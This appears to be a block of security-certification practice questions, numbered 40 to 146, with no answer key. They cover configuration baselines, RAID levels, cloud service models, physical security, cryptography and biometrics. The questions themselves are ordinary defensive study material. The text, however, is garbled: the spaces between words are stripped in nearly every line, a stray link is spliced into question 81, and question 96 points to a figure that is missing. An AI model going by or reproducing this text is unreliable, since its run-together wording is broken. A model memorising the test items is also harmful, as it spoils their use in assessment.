40. AngelawantstoensurethatIoTdevicesinherorganizationhaveasecureconfigurationwhentheyaredeployedandthattheyarereadyforfurtherconfigurationfortheirspecificpurposes.Whattermisusedtodescribethesestandardconfigurationsusedaspartofherconfigurationmanagementprogram?

A. Abaselineconfiguration

B. Anessentialsettingslist

C. Apreinstallchecklist

D. Asetupguide

41. Whyisheating,ventilation,andair-conditioning(HVAC)partoforganizationalsecurityplanning?

A. AttackersoftenuseHVACsystemsaspartofsocialengineeringexercises.

B. HVACsystemsareimportantforavailability.

C. HVACsystemsareaprimarylineofnetworkdefense.


D. Noneoftheabove

42. Whatadvantagedoessymmetricencryptionhaveoverasymmetricencryption?

A. Itismoresecure.

B. Itisfaster.

C. Itcanuselongerkeys.

D. Itsimplifieskeydistributions.

43. Lauraknowsthatpredictabilityisaprobleminpseudo-randomnumbergenerators(PRNGs)usedforencryptionoperations.WhattermdescribesthemeasureofuncertaintyusedtoaPRNG?

A. Ellipses

B. Quantumflux

C. Entropy

D. Primeness

44. WhichcloudservicemodelgivestheconsumertheabilitytouseapplicationsprovidedbythecloudproviderovertheInternet?

A. SaaS

B. PaaS

C. IaaS

D. Hybrid

45. Chrissetsaresourcepolicyinhiscloudenvironment.Whattypeofcontroldoesthisallowhimtoexert?

A. Itallowshimtodeterminehowmuchdiskspacecanbeused.

B. Itallowshimtodeterminehowmuchbandwidthcanbeused.

C. Itallowshimtospecifywhohasaccesstoresourcesandwhatactionstheycanperformonit.

D. Itallowshimtospecifywhatactionsaresourcecantakeonspecificusers.

46. ChrissetsupSANreplicationforhisorganization.Whathashedone?


A. HehasenabledRAID1toensurethattheSANcannotlosedataifadrivefailsbecausethedrivesarereplicated.

B. HehassetupbackupstoatapelibraryfortheSANtoensuredataresilience.

C. HehasbuiltasecondidenticalsetofhardwareforhisSAN.

D. HehasreplicatedthedataononeSANtoanotherattheblockorhardwarelevel.

47. Mikeisasecurityanalystandhasjustremovedmalwarefromavirtualserver.Whatfeatureofvirtualizationwouldheusetoreturnthevirtualservertoalastknowngoodstate?

A. Sandboxing

B. Hypervisor

C. Snapshot

D. Elasticity

48. Lisaisconcernedaboutfaulttoleranceforherdatabaseserver.Shewantstoensurethatifanysingledrivefails,itcanberecovered.WhatRAIDlevelwouldsupportthisgoalwhileusingdistributedparitybits?

A. RAID0

B. RAID1

C. RAID3

D. RAID5

49. JarodisconcernedaboutEMIaffectingakeyescrowserver.Whichmethodwouldbemosteffectiveinmitigatingthisrisk?

A. VLAN

B. SDN

C. Trustedplatformmodule

D. Faradaycage

50. Johnisresponsibleforphysicalsecurityathiscompany.Heisparticularlyconcernedaboutanattackerdrivingavehicleintothebuilding.Whichofthefollowingwouldprovidethebestprotectionagainstthisthreat?


A. Agate

B. Bollards

C. Asecurityguardonduty

D. Securitycameras

51. Markisresponsibleforcybersecurityatasmallcollege.Therearemanycomputerlabsthatareopenforstudentstouse.Theselabsaremonitoredonlybyastudentworker,whomayormaynotbeveryattentive.Markisconcernedaboutthetheftofcomputers.Whichofthefollowingwouldbethebestwayforhimtomitigatethisthreat?

A. Cablelocks

B. FDEonthelabcomputers

C. Strongpasswordsonthelabcomputers

D. Havingalabsign-insheet

52. Joanneisresponsibleforsecurityatapowerplant.Thefacilityisverysensitiveandsecurityisextremelyimportant.Shewantstoincorporatetwo-factorauthenticationwithphysicalsecurity.Whatwouldbethebestwaytoaccomplishthis?

A. Smartcards

B. AmantrapwithasmartcardatonedoorandaPINkeypadattheotherdoor

C. Amantrapwithvideosurveillance

D. Afencewithasmartcardgateaccess

53. Whichofthefollowingtermsreferstotheprocessofestablishingastandardforsecurity?

A. Baselining

B. Securityevaluation

C. Hardening

D. Normalization

54. Angelaconfiguresahoneypottoongoingeventslikeuserloginsandlogouts,diskusage,programandscriptloads,andsimilarinformation.


Whatisthistypeofdeceptioncalled?

A. Faketelemetry

B. Useremulation

C. Honeyfakes

D. Deepfakes

55. WhichlevelofRAIDisa“stripeofmirrors”?

A. RAID1+0

B. RAID6

C. RAID0

D. RAID1

56. Isabellaisresponsiblefordatabasemanagementandsecurity.Sheisattemptingtoremoveredundancyinthedatabase.Whatisthisprocesscalled?

A. Integritychecking

B. Deprovisioning

C. Baselining

D. Normalization

57. GarywantstoimplementanAAAservice.Whichofthefollowingservicesshouldheimplement?

A. OpenID

B. LDAP

C. RADIUS

D. SAML

58. WheredoesTLS/SSLinspectionhappen,andhowdoesitoccur?

A. Ontheclient,usingaproxy

B. Ontheserver,usingaprotocolanalyzer

C. Atthecertificateauthority,byvalidatingarequestforaTLScertificate

D. Betweentheclientandserverbyinterceptingencrypted


communications

59. Dianawantstopreventdronesfromflyingoverherorganization'sproperty.Whatcanshedo?

A. Deployautomateddronetake-downsystemsthatwillshootthedronesdown.

B. Deployradiofrequencyjammingsystemstodisruptthedrone'scontrolfrequencies.

C. ContacttheFAAtogethercompany'spropertylistedasano-flyzone.

D. Noneoftheabove

60. Isaachasconfiguredaninfrastructure-as-code-basedcloudenvironmentthatreliesoncode-definedsystembuildstospinupnewsystemsastheservicestheyrunneedtoscalehorizontally.Anattackerdiscoversavulnerabilityandexploitsasysteminthecluster,butitisshutdownandterminatedbeforetheycanperformaforensicanalysis.Whattermdescribesthistypeofenvironment?

A. Forensic-resistant

B. Nonpersistent

C. Live-boot

D. Terminateandstayresident

61. Youareresponsiblefordatabasesecurityatyourcompany.YouareconcernedthatprogrammersmightpassbadlywrittenSQLcommandstothedatabase,orthatanattackermightexploitbadlywrittenSQLinapplications.Whatisthebestwaytomitigatethisthreat?

A. Formalcodeinspection

B. Programmingpolicies

C. Agileprogramming

D. Storedprocedures

62. Joanna'scompanyhasadoptedmultiplesoftware-as-a-service(SaaS)toolsandnowwantstobettercoordinatethemsothatthedatathattheyeachcontaincanbeusedinmultipleservices.Whattypeofsolutionshouldsherecommendifshewantstominimizethecomplexityoflong-termmaintenanceforherorganization?


A. ReplacetheSaaSservicewithaplatform-as-a-service(PaaS)environmenttomoveeverythingtoasingleplatform.

B. BuildAPI-basedintegrationsusingin-houseexpertise.

C. Adoptanintegrationplatformtoleveragescalability.

D. Buildflat-fileintegrationsusingin-houseexpertise.

63. Farèsisresponsibleformanagingthemanyvirtualmachinesonhiscompany'snetworks.Overthepasttwoyears,thecompanyhasincreasedthenumberofvirtualmachinessignificantly.Farèsisnolongerabletoeffectivelymanagethelargenumberofmachines.Whatisthetermforthissituation?

A. VMoverload

B. VMsprawl

C. VMspread

D. VMzombies

64. Maryisresponsibleforvirtualizationmanagementinhercompany.SheisconcernedaboutVMescape.Whichofthefollowingmethodswouldbethemosteffectiveinmitigatingthisrisk?

A. OnlyshareresourcesbetweentheVMandhostifabsolutelynecessary.

B. KeeptheVMpatched.

C. UseafirewallontheVM.

D. Usehost-basedantimalwareontheVM.

65. Irenewantstouseacloudserviceforherorganizationthatdoesnotrequirehertodoanycodingorsystemadministration,andshewantstodominimalconfigurationtoperformthetasksthatherorganizationneedstoaccomplish.Whattypeofcloudserviceisshemostlikelylookingfor?

A. SaaS

B. PaaS

C. IaaS

D. IDaaS

66. Whichofthefollowingisnotanadvantageofaserverlessarchitecture?


A. Itdoesnotrequireasystemadministrator.

B. Itcanscaleasfunctioncallfrequencyincreases.

C. Itcanscaleasfunctioncallfrequencydecreases.

D. Itisidealforcomplexapplications.

67. Youareresponsibleforserverroomsecurityforyourcompany.Youareconcernedaboutphysicaltheftofthecomputers.Whichofthefollowingwouldbebestabletodetecttheftorattemptedtheft?

A. Motionsensor–activatedcameras

B. Smartcardaccesstotheserverrooms

C. Strongdeadboltlocksfortheserverrooms

D. Loggingeveryonewhoenterstheserverroom

68. Alexandrawantstopreventsystemsthatareinfectedwithmalwarefromconnectingtoabotnetcontrollerthatsheknowsthehostnamesfor.Whattypeofsolutioncansheimplementtopreventthesystemsfromreachingthecontroller?

A. AnIDS

B. Around-robinDNS

C. ADNSsinkhole

D. AWAF

69. Hectorisusinginfraredcamerastoverifythatserversinhisdatacenterarebeingproperlyracked.Whichofthefollowingdatacenterelementsisheconcernedabout?

A. EMIblocking

B. Humiditycontrol

C. Hotandcoldaisles

D. UPSfailover

70. Geraldisconcernedaboutunauthorizedpeopleenteringthecompany'sbuilding.Whichofthefollowingwouldbemosteffectiveinpreventingthis?

A. Alarmsystems


B. Fencing

C. Cameras

D. Securityguards

71. WhichofthefollowingisthemostimportantbenefitfromimplementingSDN?

A. Itwillstopmalware.

B. Itprovidesscalability.

C. Itwilldetectintrusions.

D. Itwillpreventsessionhijacking.

72. Markisanadministratorforahealthcarecompany.Hehastosupportanolder,legacyapplication.Heisconcernedthatthislegacyapplicationmighthavevulnerabilitiesthatwouldaffecttherestofthenetwork.Whatisthemostefficientwaytomitigatethis?

A. Useanapplicationcontainer.

B. ImplementSDN.

C. RuntheapplicationonaseparateVLAN.

D. Insistonanupdatedversionoftheapplication.

73. Charlesisperformingasecurityreviewofaninternallydevelopedwebapplication.Duringhisreview,henotesthatthedeveloperswhowrotetheapplicationhavemadeuseofthird-partylibraries.Whatrisksshouldhenoteaspartofhisreview?

A. Codecompiledwithvulnerablethird-partylibrarieswillneedtoberecompiledwithpatchedlibraries.

B. Librariesusedviacoderepositoriescouldbecomeunavailable,breakingtheapplication.

C. Maliciouscodecouldbeaddedwithoutthedevelopersknowingit.

D. Alloftheabove

74. Valerieisconsideringdeployingacloudaccesssecuritybroker.Whatsortoftoolisshelookingat?

A. Asystemthatimplementsmandatoryaccesscontroloncloud


infrastructure

B. Atoolthatsitsbetweencloudusersandapplicationstomonitoractivityandenforcepolicies

C. Atoolthatsitsbetweencloudapplicationprovidersandcustomerstoenforcewebapplicationsecuritypolicies

D. Asystemthatimplementsdiscretionaryaccesscontroloncloudinfrastructure

75. Derekhasbeenaskedtoimplementhisorganization'sservice-orientedarchitectureasasetofmicroservices.Whatdoesheneedtoimplement?

A. Asetoflooselycoupledserviceswithspecificpurposes

B. Asetofservicesthatrunonverysmallsystems

C. Asetoftightlycoupledserviceswithcustom-designedprotocolstoensurecontinuousoperation

D. Asetofservicesusingthird-partyapplicationsinaconnectednetworkenabledwithindustrystandardprotocols

76. Abigailisresponsiblefordatacentersinalarge,multinationalcompany.Shehastosupportmultipledatacentersindiversegeographicregions.Whatwouldbethemosteffectivewayforhertomanagethesecentersconsistentlyacrosstheenterprise?

A. Hiredatacentermanagersforeachcenter.

B. Implemententerprise-wideSDN.

C. Implementinfrastructureascode(IaC).

D. Automateprovisioninganddeprovisioning.

77. Elizabethwantstoimplementacloud-basedauthorizationsystem.Whichofthefollowingprotocolsisshemostlikelytouseforthatpurpose?

A. OpenID

B. Kerberos

C. SAML

D. OAuth

78. Gregisassessinganorganizationandfindsthattheyhavenumerous


multifunctionprinters(MFPs)thatareaccessiblefromthepublicInternet.Whatisthemostcriticalsecurityissueheshouldidentify?

A. Thirdpartiescouldprinttotheprinters,usingupthesupplies.

B. TheprinterscouldbeusedaspartofaDDoSattack.

C. Theprintersmayallowattackerstoaccessotherpartsofthecompanynetwork.

D. Thescannersmaybeaccessedtoallowattackerstoscandocumentsthatareleftinthem.

79. Keithhasdeployedcomputerstousersinhiscompanythatloadtheirresourcesfromacentralserverenvironmentratherthanfromtheirownharddrives.Whattermdescribesthismodel?

A. Thickclients

B. Client-as-a-server

C. Clouddesktops

D. Thinclients

80. Henrynoticesthatamalwaresampleheisanalyzingdownloadsafilefromimgur.comandthenexecutesanattackusingMimikatz,apowerfulWindowspasswordaccountthefttool.Whenheanalyzestheimage,hecannotidentifyanyrecognizablecode.Whattechniquehasmostlikelybeenusedinthisscenario?

A. Theimageisusedasdecryptionkey.

B. Thecodeishiddenintheimageusingsteganography.

C. Thecodeisencodedastextintheimage.

D. Theimageisacontrolcommandfromamalwarecommandandcontrolnetwork.

81. Mollywantstoadviseherorganization'sdevelopersonsecurecodingtechniquestoavoiddataexposure.Whichofthefollowingisnotacommontechniqueusedtopreventsensitivedataexposure?

A. Storedatainplaintext.

B. RequireHTTPsforallauthenticatedpages.

C. Ensuretokensarenotdisclosedinpublicsourcecode.


http://imgur.com

D. Hashpasswordsusingasalt.

82. Naomiwantstosecureareal-timeoperatingsystem(RTOS).WhichofthefollowingtechniquesisbestsuitedtoprovidingRTOSsecurity?

A. Disablethewebbrowser.

B. Installahostfirewall.

C. Usesecurefirmware.

D. Installantimalwaresoftware.

83. Johnisexaminingthelogsforhiscompany'swebapplications.Hediscoverswhathebelievesisabreach.Afterfurtherinvestigation,itappearsasiftheattackerexecutedcodefromoneofthelibrariestheapplicationuses,codethatisnolongerevenusedbytheapplication.Whatbestdescribesthisattack?

A. Bufferoverflow

B. Codereuseattack

C. DoSattack

D. Sessionhijacking

84. Chrisisdesigninganembeddedsystemthatneedstoprovidelow-power,peer-to-peercommunications.Whichofthefollowingtechnologiesisbestsuitedtothispurpose?

A. Basebandradio

B. Narrowbandradio

C. Zigbee

D. Cellular

85. Whattermisusedtodescribeencryptionthatcanpermitcomputationstobeconductedonciphertext,withtheresultsmatchingwhatwouldhaveoccurredifthesamecomputationswereperformedontheoriginalplaintext?

A. Identity-preservingencryption

B. Homomorphicencryption

C. Replicableencryption


D. Noneoftheabove

86. Tonywantstoimplementabiometricsystemforentryaccessinhisorganization.Whichofthefollowingsystemsislikelytobemostacceptedbymembersofhisorganization'sstaff?

A. Fingerprint

B. Retina

C. Iris

D. Voice

87. Nathanwantstoimplementoff-sitecoldbackups.Whatbackuptechnologyismostcommonlyusedforthistypeofneed?

A. SAN

B. Disk

C. Tape

D. NAS

88. Allanisconsideringimplementingoff-sitestorage.Whenhedoes,hisdatacentermanageroffersfoursolutions.Whichofthesesolutionswillbestensureresilienceandwhy?

A. Backuptoaseconddatacenterinanotherbuildingnearby,allowingreducedlatencyforbackups.

B. Backuptoanoff-sitelocationatleast90milesawaytoensurethatanaturaldisasterdoesnotdestroybothcopies.

C. Backuptoaseconddatacenterinanotherbuildingnearbytoensurethatthedatawillbeaccessibleifthepowerfailstotheprimarybuilding.

D. Backuptoanoff-sitelocationatleast10milesawaytobalancelatencyandresilienceduetonaturaldisaster.

89. Benhasbeenaskedtoexplainthesecurityimplicationsforanembeddedsystemthathisorganizationisconsideringbuildingandselling.Whichofthefollowingisnotatypicalconcernforembeddedsystems?

A. Limitedprocessorpower

B. Aninabilitytopatch


C. Lackofauthenticationcapabilities

D. Lackofbulkstorage

90. Youareconcernedaboutthesecurityofnewdevicesyourcompanyhasimplemented.SomeofthesedevicesuseSoCtechnology.Whatwouldbethebestsecuritymeasureyoucouldtakeforthese?

A. UsingaTPM

B. Ensuringeachhasitsowncryptographickey

C. UsingSED

D. UsingBIOSprotection

91. Vincentworksforacompanythatmanufacturesportablemedicaldevices,suchasinsulinpumps.Heisconcernedaboutensuringthesedevicesaresecure.Whichofthefollowingisthemostimportantstepforhimtotake?

A. Ensureallcommunicationswiththedeviceareencrypted.

B. EnsurethedeviceshaveFDE.

C. Ensurethedeviceshaveindividualantimalware.

D. Ensurethedeviceshavebeenfuzz-tested.

92. Emileisconcernedaboutsecuringthecomputersystemsinvehicles.Whichofthefollowingvehicletypeshassignificantcybersecurityvulnerabilities?

A. UAV

B. Automobiles

C. Airplanes

D. Alloftheabove

93. WhatadditionalsecuritycontrolcanAmandaimplementifsheusescompiledsoftwarethatshecannotuseifsheonlyhassoftwarebinaries?

A. Shecanreviewthesourcecode.

B. Shecantesttheapplicationinaliveenvironment.

C. Shecancheckthechecksumsprovidedbythevendor.

D. Noneoftheabove

94. Gretawantstounderstandhowaprotocolworks,includingwhatvalues


shouldbeincludedinpacketsthatusethatprotocol.Whereisthisdatadefinitivelydefinedanddocumented?

A. AnRFC

B. Wikipedia

C. TheInternetArchive

D. Noneoftheabove

95. Usingstandardnamingconventionsprovidesanumberofadvantages.Whichofthefollowingisnotanadvantageofusinganamingconvention?

A. Itcanhelpadministratorsdeterminethefunctionofasystem.

B. Itcanhelpadministratorsidentifymisconfiguredorroguesystems.

C. Itcanhelpconcealsystemsfromattackers.

D. Itcanmakescriptingeasier.

96. Whatprocessisshowninthefollowingfigure?

A. Acontinuousmonitoringenvironment

B. ACI/CDpipeline

C. Astaticcodeanalysissystem

D. Amalwareanalysisprocess

97. Keithwantstoidentifyasubjectfromcamerafootagefromatrainstation.Whatbiometrictechnologyisbestsuitedtothistypeofidentification?

A. Veinanalysis

B. Voiceprintanalysis

C. Fingerprintanalysis

D. Gaitanalysis

98. Yourcompanyisinterestedinkeepingdatainthecloud.Managementfeels


thatpubliccloudsarenotsecurebutisconcernedaboutthecostofaprivatecloud.Whatisthesolutionyouwouldrecommend?

A. Tellthemtherearenoriskswithpublicclouds.

B. Tellthemtheywillhavetofindawaytobudgetforaprivatecloud.

C. Suggestthattheyconsideracommunitycloud.

D. Recommendagainstacloudsolutionatthistime.

99. YourdevelopmentteamprimarilyusesWindows,buttheyneedtodevelopaspecificsolutionthatwillrunonLinux.WhatisthebestsolutiontogetyourprogrammersaccesstoLinuxsystemsfordevelopmentandtestingifyouwanttouseacloudsolutionwhereyoucouldrunthefinalsystemsinproductionaswell?

A. Settheirmachinestodual-bootWindowsandLinux.

B. UsePaaS.

C. SetupafewLinuxmachinesforthemtoworkwithasneeded.

D. UseIaaS.

100. Corrinehasbeenaskedtoautomatesecurityresponses,includingblockingIPaddressesfromwhichattacksaredetectedusingaseriesofscripts.Whatcriticaldangershouldsheconsiderwhilebuildingthescriptsforherorganization?

A. Thescriptscouldcauseanoutage.

B. ThescriptsmaynotrespondpromptlytoprivateIPaddresses.

C. Attackerscouldusethescriptstoattacktheorganization.

D. Auditorsmaynotallowthescripts.

101. Madhurihasconfiguredabackupthatwillbackupallofthechangestoasystemsincethelasttimethatafullbackupoccurred.Whattypeofbackuphasshesetup?

A. Asnapshot

B. Afullbackup

C. Anincrementalbackup

D. Adifferential


102. YouaretheCIOforasmallcompany.Thecompanywantstousecloudstorageforsomeofitsdata,butcostisamajorconcern.Whichofthefollowingclouddeploymentmodelswouldbebest?

A. Communitycloud

B. Privatecloud

C. Publiccloud

D. Hybridcloud

103. Whatisthepointwherefalseacceptancerateandfalserejectionratecrossoverinabiometricsystem?

A. CRE

B. FRE

C. CER

D. FRR

104. Devinisbuildingacloudsystemandwantstoensurethatitcanadapttochangesinitsworkloadbyprovisioningordeprovisioningresourcesautomatically.Hisgoalistoensurethattheenvironmentisnotoverprovisionedorunderprovisionedandthatheisefficientlyspendingmoneyonhisinfrastructure.Whatconceptdescribesthis?

A. Verticalscalability

B. Elasticity

C. Horizontalscalability

D. Normalization

105. Nathanielwantstoimprovethefaulttoleranceofaserverinhisdatacenter.Ifhewantstoensurethatapoweroutagedoesnotcausetheservertolosepower,whatisthefirstcontrolheshoulddeployfromthefollowinglist?

A. AUPS

B. Agenerator

C. Dualpowersupplies

D. Managedpowerunits(PDUs)

106. WhichofthefollowingisthebestdescriptionforVMsprawl?


A. WhenVMsonyournetworkoutnumberphysicalmachines

B. WhentherearemoreVMsthanITcaneffectivelymanage

C. WhenaVMonacomputerbeginstoconsumetoomanyresources

D. WhenVMsarespreadacrossawideareanetwork

107. Whichofthefollowingisthebestdescriptionofastoredprocedure?

A. CodethatisinaDLL,ratherthantheexecutable

B. Server-sidecodethatiscalledfromaclient

C. SQLstatementscompiledonthedatabaseserverasasingleprocedurethatcanbecalled

D. Proceduresthatarekeptonaseparateserverfromthecallingapplication,suchasinmiddleware

108. Farèsisresponsibleforsecurityathiscompany.Hehashadbollardsinstalledaroundthefrontofthebuilding.WhatisFarèstryingtoaccomplish?

A. Gatedaccessforpeopleenteringthebuilding

B. Videomonitoringaroundthebuilding

C. ProtectingagainstEMI

D. Preventingavehiclefrombeingdrivenintothebuilding

109. ThelargecompanythatSelahworksatusesbadgeswithamagneticstripeforentryaccess.WhichthreatmodelshouldSelahbeconcernedaboutwithbadgeslikethese?

A. Cloningofbadges

B. Tailgating

C. Usebyunauthorizedindividuals

D. Alloftheabove

110. YouareconcernedaboutVMescapeattackscausingasignificantdatabreach.Whichofthefollowingwouldprovidethemostprotectionagainstthis?

A. SeparateVMhostsbydatatypeorsensitivity.

B. Installahost-basedantivirusonboththeVMandthehost.


C. ImplementFDEonboththeVMandthehost.

D. UseaTPMonthehost.

111. Teresaisthenetworkadministratorforasmallcompany.Thecompanyisinterestedinarobustandmodernnetworkdefensestrategybutlacksthestafftosupportit.WhatwouldbethebestsolutionforTeresatouse?

A. ImplementSDN.

B. Useautomatedsecurity.

C. UseanMSSP.

D. Implementonlythefewsecuritycontrolstheyhavetheskillstoimplement.

112. Dennisistryingtosetupasystemtoanalyzetheintegrityofapplicationsonhisnetwork.HewantstomakesurethattheapplicationshavenotbeentamperedwithorTrojaned.Whatwouldbemostusefulinaccomplishingthisgoal?

A. ImplementNIPS.

B. Usecryptographichashes.

C. Sandboxtheapplicationsinquestion.

D. ImplementNIDS.

113. Georgeisanetworkadministratoratapowerplant.Henoticesthatseveralturbineshadunusualramp-upsincycleslastweek.Afterinvestigating,hefindsthatanexecutablewasuploadedtothesystemcontrolconsoleandcausedthis.WhichofthefollowingwouldbemosteffectiveinpreventingthisfromaffectingtheSCADAsysteminthefuture?

A. ImplementSDN.

B. Improvepatchmanagement.

C. PlacetheSCADAsystemonaseparateVLAN.

D. Implementencrypteddatatransmissions.

114. Gordonknowsthatregressiontestingisimportantbutwantstopreventoldversionsofcodefrombeingre-insertedintonewreleases.Whatprocessshouldheusetopreventthis?


A. Continuousintegration

B. Versionnumbering

C. Continuousdeployment

D. Releasemanagement

115. Miaisanetworkadministratorforabank.Sheisresponsibleforsecurecommunicationswithhercompany'scustomerwebsite.Whichofthefollowingwouldbethebestforhertoimplement?

A. SSL

B. PPTP

C. IPSec

D. TLS

116. Whichofthefollowingisnotacommonchallengewithsmartcard-basedauthenticationsystems?

A. Weaksecurityduetothelimitationsofthesmartcard'sencryptionsupport

B. Addedexpenseduetocardreaders,distribution,andsoftwareinstallation

C. Weakeruserexperienceduetotherequirementtoinsertthecardforeveryauthentication

D. Lackofsecurityduetopossessionofthecardbeingtheonlyfactorused

117. Susan'ssecurebuildingisequippedwithalarmsthatgooffifspecificdoorsareopened.Aspartofapenetrationtest,Susanwantstodetermineifthealarmsareeffective.Whattechniqueisusedbypenetrationtesterstomakealarmslesseffective?

A. Settingoffthealarmsaspartofapreannouncedtest

B. Disablingthealarmsandthenopeningdoorstoseeifstaffreporttheopeneddoors

C. Askingstaffmemberstoopenthedoorstoseeiftheywillsetthealarmoff

D. Settingoffthealarmsrepeatedlysothatstaffbecomeusedtohearing


themgooff

118. Whattermisusedtodescribethegeneralconceptof“anythingasaservice”?

A. AaaS

B. ATaaS

C. XaaS

D. ZaaS

119. Whatroledoessignageplayinbuildingsecurity?

A. Itisapreventivecontrolwarningunauthorizedindividualsawayfromsecuredareas.

B. Itcanhelpwithsafetybywarningaboutdangerousareas,materials,orequipment.

C. Itcanprovidedirectionsforevacuationandgeneralnavigation.

D. Alloftheabove

120. Norahasrentedabuildingwithaccesstobandwidthandpowerincaseherorganizationeverexperiencesadisaster.Whattypeofsitehassheestablished?

A. Ahotsite

B. Acoldsite

C. Awarmsite

D. AMOUsite

121. MattispatchingaWindowssystemandwantstohavetheabilitytoreverttoalastknowngoodconfiguration.Whatshouldheset?

A. Asystemrestorepoint

B. Areversionmarker

C. Anonpersistentpatchpoint

D. Alivebootmarker

122. Whichmultifactorauthenticationcansufferfromproblemsifthesystemordevice'stimeisnotcorrect?


A. TOTP

B. SMS

C. HOTP

D. MMAC

123. ThecompanythatNinaworksforhassufferedfromrecenttheftsofpackagesfromalow-securitydeliveryarea.Whattypeofcameracapabilitycantheyusetoensurethatarecentlydeliveredpackageisproperlymonitored?

A. Infraredimagecapture

B. Motiondetection

C. Objectdetection

D. Facialrecognition

124. Whichofthefollowingisnotacommonorganizationalsecurityconcernforwearabledevices?

A. GPSlocationdataexposure

B. Dataexposure

C. Userhealthdataexposure

D. Insecurewirelessconnectivity

125. TimisbuildingaFaradaycagearoundhisserverroom.WhatistheprimarypurposeofaFaradaycage?

A. Toregulatetemperature

B. Toregulatecurrent

C. Toblockintrusions

D. ToblockEMI

126. Youareworkingforalargecompany.Youaretryingtofindasolutionthatwillprovidecontrolledphysicalaccesstothebuildingandrecordeveryemployeewhoentersthebuilding.Whichofthefollowingwouldbethebestforyoutoimplement?

A. Asecurityguardwithasign-insheet

B. Smartcardaccessusingelectroniclocks


C. Acamerabytheentrance

D. Asign-insheetbythefrontdoor

127. Whatconcerncausesorganizationstochoosephysicallocksoverelectroniclocks?

A. Theyprovidegreatersecurity.

B. Theyareresistanttobypassattempts.

C. Theyarehardertopick.

D. Theydonotrequirepower.

128. KarahasbeenaskedtoincludeIPschemamanagementaspartofherconfigurationmanagementefforts.WhichofthefollowingisasecurityadvantageofIPschemaconfigurationmanagement?

A. Detectingroguedevices

B. UsingIPaddressestosecureencryptionkeys

C. Preventingdenial-of-serviceattacks

D. AvoidingIPaddressexhaustion

129. Caroleisconcernedaboutsecurityforherserverroom.Shewantsthemostsecurelockshecanfindfortheserverroomdoor.Whichofthefollowingwouldbethebestchoiceforher?

A. Combinationlock

B. Key-in-knob

C. Deadbolt

D. Padlock

130. MelissawantstoimplementNICteamingforaserverinherdatacenter.Whattwomajorcapabilitieswillthisprovideforher?

A. Lowerlatencyandgreaterthroughput

B. Greaterthroughputandfaulttolerance

C. Higherlatencyandfaulttolerance

D. Faulttoleranceandlowerlatency

131. Mollyisimplementingbiometricsinhercompany.Whichofthefollowing


shouldbeherbiggestconcern?

A. FAR

B. FRR

C. CER

D. EER

132. Mikeisconcernedaboutdatasovereigntyfordatathathisorganizationcapturesandmaintains.Whatbestdescribeshisconcern?

A. Whoownsthedatathatiscapturedonsystemshostedinacloudprovider'sinfrastructure?

B. CanMike'sorganizationmakedecisionsaboutdatathatispartofitsservice,ordoesitbelongtousers?

C. Isthedatalocatedinacountrysubjecttothelawsofthecountrywhereitisstored?

D. Doesdatahaverightsonitsown,ordoestheownerofthedatadeterminewhatrightsmayapplytoit?

133. Whatarethekeylimitingfactorsforcryptographyonlow-powerdevices?

A. Therearesystemlimitationsonmemory,CPU,andstorage.

B. Thedevicescannotsupportpublickeyencryptionduetoaninabilitytofactorprimenumbers.

C. Thereisalackofchipsetsupportforencryption.

D. Legallimitationsforlow-powerdevicespreventencryptionfrombeingsupported.

134. Fredisresponsibleforphysicalsecurityinhiscompany.HewantstofindagoodwaytoprotecttheUSBthumbdrivesthathaveBitLockerkeysstoredonthem.Whichofthefollowingwouldbethebestsolutionforthissituation?

A. Storethedrivesinasecurecabinetorsafe.

B. Encryptthethumbdrives.

C. Don'tstoreBitLockerkeysonthesedrives.

D. Lockthethumbdrivesindeskdrawers.


135. Juanitaisresponsibleforserversinhercompany.Sheislookingforafault-tolerantsolutionthatcanhandletwodrivesfailing.Whichofthefollowingshouldsheselect?

A. RAID3

B. RAID0

C. RAID5

D. RAID6

136. Maria'sorganizationusesaCCTVmonitoringsystemintheirmainofficebuilding,whichisoccupiedandinuse24-7.Thesystemusescamerasconnectedtodisplaystoprovidereal-timemonitoring.WhatadditionalfeatureisthemostlikelytoreceiverequeststoensurethatherorganizationcaneffectivelyusetheCCTVsystemtorespondtotheftandotherissues?

A. Motionactivation

B. Infraredcameras

C. DVR

D. Facialrecognition

137. Whatistheprimarythreatmodelagainststaticcodesusedformultifactorauthentication?

A. Bruteforce

B. Collisions

C. Theft

D. Clockmismatch

138. Dennisneedsacryptographicalgorithmthatprovideslowlatency.Whattypeofcryptosystemismostlikelytomeetthisperformancerequirement?

A. Hashing

B. Symmetricencryption

C. Asymmetricencryption

D. Electronicone-timepad

139. ThecompanythatDevinworksforhasselectedanondescriptbuildinganddoesnotuseexteriorsignagetoadvertisethatthefacilitybelongstothem.


Whatphysicalsecuritytermdescribesthistypeofsecuritycontrol?

A. Industrialcamouflage

B. Demilitarizedzone

C. Industrialobfuscation

D. Disruptivecoloration

140. EdknowsthatTLSsessionsstartusingasymmetricencryption,andthenmovetousesymmetrickeys.Whatlimitationofasymmetriccryptographydrivesthisdesigndecision?

A. Speedandcomputationaloverhead

B. Keylengthlimitations

C. Lifespan(time)tobruteforceit

D. Keyreuseforasymmetricalgorithms

141. Whenyouareconcernedaboutapplicationsecurity,whatisthemostimportantissueinmemorymanagement?

A. Neverallocateavariableanylargerthanisneeded.

B. Alwayscheckboundsonarrays.

C. Alwaysdeclareavariablewhereyouneedit(i.e.,atfunctionorfilelevelifpossible).

D. Makesureyoureleaseanymemoryyouallocate.

142. Bartwantstoensurethatthefilesheencryptsremainsecureforaslongaspossible.WhatshouldBartdotomaximizethelongevityofhisencryptedfile'ssecurity?

A. Useaquantumcipher.

B. Usethelongestkeypossible.

C. Useananti-quantumcipher.

D. Usearotatingsymmetrickey.

143. Nadine'sorganizationstoresandusessensitiveinformation,includingSocialSecuritynumbers.Afterarecentcompromise,shehasbeenaskedtoimplementtechnologythatcanhelppreventthissensitivedatafromleavingthecompany'ssystemsandnetworks.Whattypeoftechnologyshould


Nadineimplement?

A. Statefulfirewalls

B. OEM

C. DLP

D. SIEM

144. Whatformisthedatausedforquantumkeydistributionsentin?

A. Bytes

B. Bits

C. Qubits

D. Nuquants

145. Alicianeedstoensurethataprocesscannotbesubvertedbyasingleemployee.Whatsecuritycontrolcansheimplementtopreventthis?

A. Biometricauthentication

B. Two-personcontrol

C. Roboticsentries

D. ADMZ

146. Sociallogin,theabilitytouseanexistingidentityfromasitelikeGoogle,Facebook,oraMicrosoftaccount,isanexampleofwhichofthefollowingconcepts?

A. Federation

B. AAA

C. Privilegecreep

D. Identityandaccessmanagement

